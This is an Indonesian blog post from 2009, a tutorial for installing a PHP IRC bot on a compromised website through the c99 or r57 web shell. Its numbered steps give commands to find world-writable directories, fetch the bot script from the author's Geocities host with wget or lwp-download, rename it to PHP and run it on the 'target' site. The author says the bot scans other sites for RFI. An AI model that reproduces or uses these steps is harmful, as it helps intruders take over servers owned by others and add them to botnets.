Kamis, 22 Oktober 2009

Cara Pembuatan Bot PHP di mIRC Lewat Shell Injection

Ini adalah salah satu cara pembuatan bot PHP di mIRC. Bot ini adalah salah satu alternatif pembuatan bot selain menggunakan tcl. Anda bisa mengambil scriptnya di page script collections pada blog saya ini. disini saya menggunakan shell c99 dan r57 sebagai panduannya.

Langkah-langkahnya adalah sebagai berikut :

  1. Copy paste dan simpan script yang saya beri di geocities ato web anda kedalam format txt, ato anda juga bisa langsung menggunakan milik saya
  2. Masuk ke shell web injection anda
  3. Cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”
  4. Yang perlu diingat adalah cari directory yang memberikan permission lengkap ato 777 di subdirektori dari public html web tersebut. Maksudnya adalah untuk dapat mengakses dan membuat botnya. Jadi anda tidak bisa menguploadnya ke directory tmp.
  5. Setelah anda menemukan direktori yang cocok, wget script bot dari web geocities saya ato dari tempat anda. saya pake contoh punya saya, jadi commandnya “wget geocities.com/rah_polenk/files/bot.txt”
  6. jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://www.geocities.com/rah_polenk/files/bot.txt”
  7. kalo ga bisa juga, pakailah fitur uploadnya karena saya menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, donlot aja dari geocities.com/rah_polenk/files/bot.txt
  8. Saya anggap script tersebut udah di upload, maka gantilah nama filenya dengan command “mv bot.txt bot.php”
  9. Ingatlah.. bahwa anda harus menguploadnya ke subdirectory dari public html web yang anda injeksi. semisal seperti ini, nama webnya adalah www.target.com dan saya menguploadnya ke subdirectory module. jadi link untuk mengaksesnya adalah www.target.com/module/bot.php
  10. Maka arahkan browser anda dengan membuka link bot anda. jadi bukalah link www.target.com/module/bot.php
  11. Ikuti langkah pembuatannya..
  12. Masuklah ke channel IRC tempat anda mensetting dimana bot anda akan muncul
  13. Jika berhasil, maka bot akan pm/pv anda
  14. Kemudian ketik “!auth password” contohnya “!auth lenkganteng” agar anda dikenali oleh botnya
  15. Dan untuk melihat list helpnya ketik “!help”

Ket :

  1. Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject
  2. Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
  3. Semua command di atas tanpa tanda petik dua (”)

Sekian.. semoga membantu… :D



Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)